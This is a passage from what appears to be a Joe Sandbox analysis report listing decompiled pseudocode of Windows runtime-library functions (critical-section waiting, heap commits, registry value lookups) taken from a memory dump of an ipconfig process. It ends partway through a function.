              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: PATH
              • API String ID: 0-1036084923
              • Opcode ID: 617ff719e6469694a2a414499b98a3fe4856264bd7042efcfd0711b6739d8592
              • Instruction ID: 6f4e0a7d7c94e81c431e6c86e613c1ff1a15ffcaea44d67a4a9b3bef6b38f58c
              • Opcode Fuzzy Hash: 617ff719e6469694a2a414499b98a3fe4856264bd7042efcfd0711b6739d8592
              • Instruction Fuzzy Hash: 8FC1AFB1E80219DBCB15DF98D990BEEF7B1FF48744F64902DEA01AB250D774A842CB60
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 63%
              			E02E92D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
              				signed char _v8;
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				signed int _v52;
              				void* __esi;
              				void* __ebp;
              				intOrPtr _t55;
              				signed int _t57;
              				signed int _t58;
              				char* _t62;
              				signed char* _t63;
              				signed char* _t64;
              				signed int _t67;
              				signed int _t72;
              				signed int _t77;
              				signed int _t78;
              				signed int _t88;
              				intOrPtr _t89;
              				signed char _t93;
              				signed int _t97;
              				signed int _t98;
              				signed int _t102;
              				signed int _t103;
              				intOrPtr _t104;
              				signed int _t105;
              				signed int _t106;
              				signed char _t109;
              				signed int _t111;
              				void* _t116;
              
              				_t102 = __edi;
              				_t97 = __edx;
              				_v12 = _v12 & 0x00000000;
              				_t55 =  *[fs:0x18];
              				_t109 = __ecx;
              				_v8 = __edx;
              				_t86 = 0;
              				_v32 = _t55;
              				_v24 = 0;
              				_push(__edi);
              				if(__ecx == 0x2f85350) {
              					_t86 = 1;
              					_v24 = 1;
              					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
              				}
              				_t103 = _t102 | 0xffffffff;
              				if( *0x2f87bc8 != 0) {
              					_push(0xc000004b);
              					_push(_t103);
              					E02ED97C0();
              				}
              				if( *0x2f879c4 != 0) {
              					_t57 = 0;
              				} else {
              					_t57 = 0x2f879c8;
              				}
              				_v16 = _t57;
              				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
              					_t93 = _t109;
              					L23();
              				}
              				_t58 =  *_t109;
              				if(_t58 == _t103) {
              					__eflags =  *(_t109 + 0x14) & 0x01000000;
              					_t58 = _t103;
              					if(__eflags == 0) {
              						_t93 = _t109;
              						E02EC1624(_t86, __eflags);
              						_t58 =  *_t109;
              					}
              				}
              				_v20 = _v20 & 0x00000000;
              				if(_t58 != _t103) {
              					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
              				}
              				_t104 =  *((intOrPtr*)(_t109 + 0x10));
              				_t88 = _v16;
              				_v28 = _t104;
              				L9:
              				while(1) {
              					if(E02EB7D50() != 0) {
              						_t62 = ( *[fs:0x30])[0x50] + 0x228;
              					} else {
              						_t62 = 0x7ffe0382;
              					}
              					if( *_t62 != 0) {
              						_t63 =  *[fs:0x30];
              						__eflags = _t63[0x240] & 0x00000002;
              						if((_t63[0x240] & 0x00000002) != 0) {
              							_t93 = _t109;
              							E02F2FE87(_t93);
              						}
              					}
              					if(_t104 != 0xffffffff) {
              						_push(_t88);
              						_push(0);
              						_push(_t104);
              						_t64 = E02ED9520();
              						goto L15;
              					} else {
              						while(1) {
              							_t97 =  &_v8;
              							_t64 = E02ECE18B(_t109 + 4, _t97, 4, _t88, 0);
              							if(_t64 == 0x102) {
              								break;
              							}
              							_t93 =  *(_t109 + 4);
              							_v8 = _t93;
              							if((_t93 & 0x00000002) != 0) {
              								continue;
              							}
              							L15:
              							if(_t64 == 0x102) {
              								break;
              							}
              							_t89 = _v24;
              							if(_t64 < 0) {
              								L02EEDF30(_t93, _t97, _t64);
              								_push(_t93);
              								_t98 = _t97 | 0xffffffff;
              								__eflags =  *0x2f86901;
              								_push(_t109);
              								_v52 = _t98;
              								if( *0x2f86901 != 0) {
              									_push(0);
              									_push(1);
              									_push(0);
              									_push(0x100003);
              									_push( &_v12);
              									_t72 = E02ED9980();
              									__eflags = _t72;
              									if(_t72 < 0) {
              										_v12 = _t98 | 0xffffffff;
              									}
              								}
              								asm("lock cmpxchg [ecx], edx");
              								_t111 = 0;
              								__eflags = 0;
              								if(0 != 0) {
              									__eflags = _v12 - 0xffffffff;
              									if(_v12 != 0xffffffff) {
              										_push(_v12);
              										E02ED95D0();
              									}
              								} else {
              									_t111 = _v12;
              								}
              								return _t111;
              							} else {
              								if(_t89 != 0) {
              									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
              									_t77 = E02EB7D50();
              									__eflags = _t77;
              									if(_t77 == 0) {
              										_t64 = 0x7ffe0384;
              									} else {
              										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
              									}
              									__eflags =  *_t64;
              									if( *_t64 != 0) {
              										_t64 =  *[fs:0x30];
              										__eflags = _t64[0x240] & 0x00000004;
              										if((_t64[0x240] & 0x00000004) != 0) {
              											_t78 = E02EB7D50();
              											__eflags = _t78;
              											if(_t78 == 0) {
              												_t64 = 0x7ffe0385;
              											} else {
              												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
              											}
              											__eflags =  *_t64 & 0x00000020;
              											if(( *_t64 & 0x00000020) != 0) {
              												_t64 = E02F17016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
              											}
              										}
              									}
              								}
              								return _t64;
              							}
              						}
              						_t97 = _t88;
              						_t93 = _t109;
              						E02F2FDDA(_t97, _v12);
              						_t105 =  *_t109;
              						_t67 = _v12 + 1;
              						_v12 = _t67;
              						__eflags = _t105 - 0xffffffff;
              						if(_t105 == 0xffffffff) {
              							_t106 = 0;
              							__eflags = 0;
              						} else {
              							_t106 =  *(_t105 + 0x14);
              						}
              						__eflags = _t67 - 2;
              						if(_t67 > 2) {
              							__eflags = _t109 - 0x2f85350;
              							if(_t109 != 0x2f85350) {
              								__eflags = _t106 - _v20;
              								if(__eflags == 0) {
              									_t93 = _t109;
              									E02F2FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
              								}
              							}
              						}
              						_push("RTL: Re-Waiting\n");
              						_push(0);
              						_push(0x65);
              						_v20 = _t106;
              						E02F25720();
              						_t104 = _v28;
              						_t116 = _t116 + 0xc;
              						continue;
              					}
              				}
              			}


              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Re-Waiting
              • API String ID: 0-316354757
              • Opcode ID: c610ef8f1b5eb58699c994ac1689bd8412d6b5f8827ba9465e27c19816495ded
              • Instruction ID: 82a88482022fdc5d1abe49ef9c724ef5d8784f765ed231fe6e28b9b3ac955554
              • Opcode Fuzzy Hash: c610ef8f1b5eb58699c994ac1689bd8412d6b5f8827ba9465e27c19816495ded
              • Instruction Fuzzy Hash: F9615A31A80604AFDF32DF68C880BBEB7B9EB45318F14D656EA169B6D0C7349941CB81
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E02F60EA5(void* __ecx, void* __edx) {
              				signed int _v20;
              				char _v24;
              				intOrPtr _v28;
              				unsigned int _v32;
              				signed int _v36;
              				intOrPtr _v40;
              				char _v44;
              				intOrPtr _v64;
              				void* __ebx;
              				void* __edi;
              				signed int _t58;
              				unsigned int _t60;
              				intOrPtr _t62;
              				char* _t67;
              				char* _t69;
              				void* _t80;
              				void* _t83;
              				intOrPtr _t93;
              				intOrPtr _t115;
              				char _t117;
              				void* _t120;
              
              				_t83 = __edx;
              				_t117 = 0;
              				_t120 = __ecx;
              				_v44 = 0;
              				if(E02F5FF69(__ecx,  &_v44,  &_v32) < 0) {
              					L24:
              					_t109 = _v44;
              					if(_v44 != 0) {
              						E02F61074(_t83, _t120, _t109, _t117, _t117);
              					}
              					L26:
              					return _t117;
              				}
              				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
              				_t5 = _t83 + 1; // 0x1
              				_v36 = _t5 << 0xc;
              				_v40 = _t93;
              				_t58 =  *(_t93 + 0xc) & 0x40000000;
              				asm("sbb ebx, ebx");
              				_t83 = ( ~_t58 & 0x0000003c) + 4;
              				if(_t58 != 0) {
              					_push(0);
              					_push(0x14);
              					_push( &_v24);
              					_push(3);
              					_push(_t93);
              					_push(0xffffffff);
              					_t80 = E02ED9730();
              					_t115 = _v64;
              					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
              						_push(_t93);
              						E02F5A80D(_t115, 1, _v20, _t117);
              						_t83 = 4;
              					}
              				}
              				if(E02F5A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
              					goto L24;
              				}
              				_t60 = _v32;
              				_t97 = (_t60 != 0x100000) + 1;
              				_t83 = (_v44 -  *0x2f88b04 >> 0x14) + (_v44 -  *0x2f88b04 >> 0x14);
              				_v28 = (_t60 != 0x100000) + 1;
              				_t62 = _t83 + (_t60 >> 0x14) * 2;
              				_v40 = _t62;
              				if(_t83 >= _t62) {
              					L10:
              					asm("lock xadd [eax], ecx");
              					asm("lock xadd [eax], ecx");
              					if(E02EB7D50() == 0) {
              						_t67 = 0x7ffe0380;
              					} else {
              						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
              					}
              					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
              						E02F5138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
              					}
              					if(E02EB7D50() == 0) {
              						_t69 = 0x7ffe0388;
              					} else {
              						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              					}
              					if( *_t69 != 0) {
              						E02F4FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
              					}
              					if(( *0x2f88724 & 0x00000008) != 0) {
              						E02F552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
              					}
              					_t117 = _v44;
              					goto L26;
              				}
              				while(E02F615B5(0x2f88ae4, _t83, _t97, _t97) >= 0) {
              					_t97 = _v28;
              					_t83 = _t83 + 2;
              					if(_t83 < _v40) {
              						continue;
              					}
              					goto L10;
              				}
              				goto L24;
              			}


              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: `
              • API String ID: 0-2679148245
              • Opcode ID: 2e39684077b7e7eff918926285573de23a46fa53d07fce4bcc74a76c6cd25bbd
              • Instruction ID: 8396c09a0ae76c9406d09772fa01b67079a4a8afb2f6d426160515ebed8807b9
              • Opcode Fuzzy Hash: 2e39684077b7e7eff918926285573de23a46fa53d07fce4bcc74a76c6cd25bbd
              • Instruction Fuzzy Hash: 9B51B171204381AFD725DF18D988B2BB7E6FBC4784F144A2CFA5697290D770E805CB61
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E02ECF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				char* _v20;
              				intOrPtr _v24;
              				char _v28;
              				intOrPtr _v32;
              				char _v36;
              				char _v44;
              				char _v52;
              				intOrPtr _v56;
              				char _v60;
              				intOrPtr _v72;
              				void* _t51;
              				void* _t58;
              				signed short _t82;
              				short _t84;
              				signed int _t91;
              				signed int _t100;
              				signed short* _t103;
              				void* _t108;
              				intOrPtr* _t109;
              
              				_t103 = __ecx;
              				_t82 = __edx;
              				_t51 = E02EB4120(0, __ecx, 0,  &_v52, 0, 0, 0);
              				if(_t51 >= 0) {
              					_push(0x21);
              					_push(3);
              					_v56 =  *0x7ffe02dc;
              					_v20 =  &_v52;
              					_push( &_v44);
              					_v28 = 0x18;
              					_push( &_v28);
              					_push(0x100020);
              					_v24 = 0;
              					_push( &_v60);
              					_v16 = 0x40;
              					_v12 = 0;
              					_v8 = 0;
              					_t58 = E02ED9830();
              					_t87 =  *[fs:0x30];
              					_t108 = _t58;
              					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
              					if(_t108 < 0) {
              						L11:
              						_t51 = _t108;
              					} else {
              						_push(4);
              						_push(8);
              						_push( &_v36);
              						_push( &_v44);
              						_push(_v60);
              						_t108 = E02ED9990();
              						if(_t108 < 0) {
              							L10:
              							_push(_v60);
              							E02ED95D0();
              							goto L11;
              						} else {
              							_t18 = _t82 + 0x18; // 0x402bf01a
              							_t109 = L02EB4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
              							if(_t109 == 0) {
              								_t108 = 0xc0000017;
              								goto L10;
              							} else {
              								_t21 = _t109 + 0x18; // 0x18
              								 *((intOrPtr*)(_t109 + 4)) = _v60;
              								 *_t109 = 1;
              								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
              								 *(_t109 + 0xe) = _t82;
              								 *((intOrPtr*)(_t109 + 8)) = _v56;
              								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
              								_t29 =  &(_t103[2]); // 0x2000402b
              								E02EDF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
              								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
              								 *((short*)(_t109 + 0xc)) =  *_t103;
              								_t91 =  *_t103 & 0x0000ffff;
              								_t34 =  &(_t103[2]); // 0x2000402b
              								_t100 = _t91 & 0xfffffffe;
              								_t84 = 0x5c;
              								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
              									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
              										_push(_v60);
              										E02ED95D0();
              										L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
              										_t51 = 0xc0000106;
              									} else {
              										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
              										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
              										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
              										goto L5;
              									}
              								} else {
              									L5:
              									 *_a4 = _t109;
              									_t51 = 0;
              								}
              							}
              						}
              					}
              				}
              				return _t51;
              			}

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: @
              • API String ID: 0-2766056989
              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
              • Instruction ID: c118c1e322fc31bae6ab7547d01b66219aabd306ab24f828c9dcfdd5adf65ef5
              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
              • Instruction Fuzzy Hash: 1D51BD71540710AFC321CF69C840A6BB7F9FF88714F108A2EFA9597691E7B4E901CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 75%
              			E02F13540(intOrPtr _a4) {
              				signed int _v12;
              				intOrPtr _v88;
              				intOrPtr _v92;
              				char _v96;
              				char _v352;
              				char _v1072;
              				intOrPtr _v1140;
              				intOrPtr _v1148;
              				char _v1152;
              				char _v1156;
              				char _v1160;
              				char _v1164;
              				char _v1168;
              				char* _v1172;
              				short _v1174;
              				char _v1176;
              				char _v1180;
              				char _v1192;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				short _t41;
              				short _t42;
              				intOrPtr _t80;
              				intOrPtr _t81;
              				signed int _t82;
              				void* _t83;
              
              				_v12 =  *0x2f8d360 ^ _t82;
              				_t41 = 0x14;
              				_v1176 = _t41;
              				_t42 = 0x16;
              				_v1174 = _t42;
              				_v1164 = 0x100;
              				_v1172 = L"BinaryHash";
              				_t81 = E02ED0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
              				if(_t81 < 0) {
              					L11:
              					_t75 = _t81;
              					E02F13706(0, _t81, _t79, _t80);
              					L12:
              					if(_a4 != 0xc000047f) {
              						E02EDFA60( &_v1152, 0, 0x50);
              						_v1152 = 0x60c201e;
              						_v1148 = 1;
              						_v1140 = E02F13540;
              						E02EDFA60( &_v1072, 0, 0x2cc);
              						_push( &_v1072);
              						E02EEDDD0( &_v1072, _t75, _t79, _t80, _t81);
              						E02F20C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
              						_push(_v1152);
              						_push(0xffffffff);
              						E02ED97C0();
              					}
              					return E02EDB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
              				}
              				_t79 =  &_v352;
              				_t81 = E02F13971(0, _a4,  &_v352,  &_v1156);
              				if(_t81 < 0) {
              					goto L11;
              				}
              				_t75 = _v1156;
              				_t79 =  &_v1160;
              				_t81 = E02F13884(_v1156,  &_v1160,  &_v1168);
              				if(_t81 >= 0) {
              					_t80 = _v1160;
              					E02EDFA60( &_v96, 0, 0x50);
              					_t83 = _t83 + 0xc;
              					_push( &_v1180);
              					_push(0x50);
              					_push( &_v96);
              					_push(2);
              					_push( &_v1176);
              					_push(_v1156);
              					_t81 = E02ED9650();
              					if(_t81 >= 0) {
              						if(_v92 != 3 || _v88 == 0) {
              							_t81 = 0xc000090b;
              						}
              						if(_t81 >= 0) {
              							_t75 = _a4;
              							_t79 =  &_v352;
              							E02F13787(_a4,  &_v352, _t80);
              						}
              					}
              					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
              				}
              				_push(_v1156);
              				E02ED95D0();
              				if(_t81 >= 0) {
              					goto L12;
              				} else {
              					goto L11;
              				}
              			}

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: BinaryHash
              • API String ID: 0-2202222882
              • Opcode ID: d5908c19c9c4822c4eef141bf128be41797f1d363f51be9ec6af17d63f243481
              • Instruction ID: 59aba9cab14991e999c12e0b9026148cf8a3ec76c03b441883bd308b07aa3436
              • Opcode Fuzzy Hash: d5908c19c9c4822c4eef141bf128be41797f1d363f51be9ec6af17d63f243481
              • Instruction Fuzzy Hash: 2F4121B2D4056C9ADB21DA50CC80FAEB77DAB45758F4085E5EB09AB240DB309E898F94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 71%
              			E02F605AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
              				signed int _v20;
              				char _v24;
              				signed int _v28;
              				char _v32;
              				signed int _v36;
              				intOrPtr _v40;
              				void* __ebx;
              				void* _t35;
              				signed int _t42;
              				char* _t48;
              				signed int _t59;
              				signed char _t61;
              				signed int* _t79;
              				void* _t88;
              
              				_v28 = __edx;
              				_t79 = __ecx;
              				if(E02F607DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
              					L13:
              					_t35 = 0;
              					L14:
              					return _t35;
              				}
              				_t61 = __ecx[1];
              				_t59 = __ecx[0xf];
              				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
              				_v36 = _a8 << 0xc;
              				_t42 =  *(_t59 + 0xc) & 0x40000000;
              				asm("sbb esi, esi");
              				_t88 = ( ~_t42 & 0x0000003c) + 4;
              				if(_t42 != 0) {
              					_push(0);
              					_push(0x14);
              					_push( &_v24);
              					_push(3);
              					_push(_t59);
              					_push(0xffffffff);
              					if(E02ED9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
              						_push(_t61);
              						E02F5A80D(_t59, 1, _v20, 0);
              						_t88 = 4;
              					}
              				}
              				_t35 = E02F5A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
              				if(_t35 < 0) {
              					goto L14;
              				}
              				E02F61293(_t79, _v40, E02F607DF(_t79, _v28,  &_a4,  &_a8, 1));
              				if(E02EB7D50() == 0) {
              					_t48 = 0x7ffe0380;
              				} else {
              					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
              				}
              				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
              					E02F5138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
              				}
              				goto L13;
              			}

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: `
              • API String ID: 0-2679148245
              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
              • Instruction ID: 3b66de118f6263a340077e319177c27278a0617a1dce5a87965836b3df2cb1cd
              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
              • Instruction Fuzzy Hash: 6F31E2326003556BE710DE24CD48FA77799FB84798F144229FB589B2C0DB71E914CF91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 72%
              			E02F13884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
              				char _v8;
              				intOrPtr _v12;
              				intOrPtr* _v16;
              				char* _v20;
              				short _v22;
              				char _v24;
              				intOrPtr _t38;
              				short _t40;
              				short _t41;
              				void* _t44;
              				intOrPtr _t47;
              				void* _t48;
              
              				_v16 = __edx;
              				_t40 = 0x14;
              				_v24 = _t40;
              				_t41 = 0x16;
              				_v22 = _t41;
              				_t38 = 0;
              				_v12 = __ecx;
              				_push( &_v8);
              				_push(0);
              				_push(0);
              				_push(2);
              				_t43 =  &_v24;
              				_v20 = L"BinaryName";
              				_push( &_v24);
              				_push(__ecx);
              				_t47 = 0;
              				_t48 = E02ED9650();
              				if(_t48 >= 0) {
              					_t48 = 0xc000090b;
              				}
              				if(_t48 != 0xc0000023) {
              					_t44 = 0;
              					L13:
              					if(_t48 < 0) {
              						L16:
              						if(_t47 != 0) {
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
              						}
              						L18:
              						return _t48;
              					}
              					 *_v16 = _t38;
              					 *_a4 = _t47;
              					goto L18;
              				}
              				_t47 = L02EB4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
              				if(_t47 != 0) {
              					_push( &_v8);
              					_push(_v8);
              					_push(_t47);
              					_push(2);
              					_push( &_v24);
              					_push(_v12);
              					_t48 = E02ED9650();
              					if(_t48 < 0) {
              						_t44 = 0;
              						goto L16;
              					}
              					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
              						_t48 = 0xc000090b;
              					}
              					_t44 = 0;
              					if(_t48 < 0) {
              						goto L16;
              					} else {
              						_t17 = _t47 + 0xc; // 0xc
              						_t38 = _t17;
              						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
              							_t48 = 0xc000090b;
              						}
              						goto L13;
              					}
              				}
              				_t48 = _t48 + 0xfffffff4;
              				goto L18;
              			}

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: BinaryName
              • API String ID: 0-215506332
              • Opcode ID: 2a8cea6836f797f4a540398561ee51405bba1fa0a7bc89ca8d48b755c21e6636
              • Instruction ID: d70dbcff0270171fa448dcde082dc7144456e2d52786bd8c22a91074e1907d59
              • Opcode Fuzzy Hash: 2a8cea6836f797f4a540398561ee51405bba1fa0a7bc89ca8d48b755c21e6636
              • Instruction Fuzzy Hash: FE310372D00519AFDB15DB58C955EABB776EF80B60F8181A9EE14A7284D7309E00CBE0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 33%
              			E02ECD294(void* __ecx, char __edx, void* __eflags) {
              				signed int _v8;
              				char _v52;
              				signed int _v56;
              				signed int _v60;
              				intOrPtr _v64;
              				char* _v68;
              				intOrPtr _v72;
              				char _v76;
              				signed int _v84;
              				intOrPtr _v88;
              				char _v92;
              				intOrPtr _v96;
              				intOrPtr _v100;
              				char _v104;
              				char _v105;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t35;
              				char _t38;
              				signed int _t40;
              				signed int _t44;
              				signed int _t52;
              				void* _t53;
              				void* _t55;
              				void* _t61;
              				intOrPtr _t62;
              				void* _t64;
              				signed int _t65;
              				signed int _t66;
              
              				_t68 = (_t66 & 0xfffffff8) - 0x6c;
              				_v8 =  *0x2f8d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
              				_v105 = __edx;
              				_push( &_v92);
              				_t52 = 0;
              				_push(0);
              				_push(0);
              				_push( &_v104);
              				_push(0);
              				_t59 = __ecx;
              				_t55 = 2;
              				if(E02EB4120(_t55, __ecx) < 0) {
              					_t35 = 0;
              					L8:
              					_pop(_t61);
              					_pop(_t64);
              					_pop(_t53);
              					return E02EDB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
              				}
              				_v96 = _v100;
              				_t38 = _v92;
              				if(_t38 != 0) {
              					_v104 = _t38;
              					_v100 = _v88;
              					_t40 = _v84;
              				} else {
              					_t40 = 0;
              				}
              				_v72 = _t40;
              				_v68 =  &_v104;
              				_push( &_v52);
              				_v76 = 0x18;
              				_push( &_v76);
              				_v64 = 0x40;
              				_v60 = _t52;
              				_v56 = _t52;
              				_t44 = E02ED98D0();
              				_t62 = _v88;
              				_t65 = _t44;
              				if(_t62 != 0) {
              					asm("lock xadd [edi], eax");
              					if((_t44 | 0xffffffff) != 0) {
              						goto L4;
              					}
              					_push( *((intOrPtr*)(_t62 + 4)));
              					E02ED95D0();
              					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
              					goto L4;
              				} else {
              					L4:
              					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
              					if(_t65 >= 0) {
              						_t52 = 1;
              					} else {
              						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
              							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
              						}
              					}
              					_t35 = _t52;
              					goto L8;
              				}
              			}

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: @
              • API String ID: 0-2766056989
              • Opcode ID: 37b04612743fb2709c200c4615d381d66e6e2e2a01a369d3a69826026fcf4613
              • Instruction ID: c073db3617bff8216529d09844f91c39c1f41aca592622a3537f6fbc2f2b7ae7
              • Opcode Fuzzy Hash: 37b04612743fb2709c200c4615d381d66e6e2e2a01a369d3a69826026fcf4613
              • Instruction Fuzzy Hash: 133190B25883459FC311DF68CE80AABBBE8EF85754F10692EF99483250D735DD06CB92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 72%
              			E02EA1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
              				intOrPtr _v8;
              				char _v16;
              				intOrPtr* _t26;
              				intOrPtr _t29;
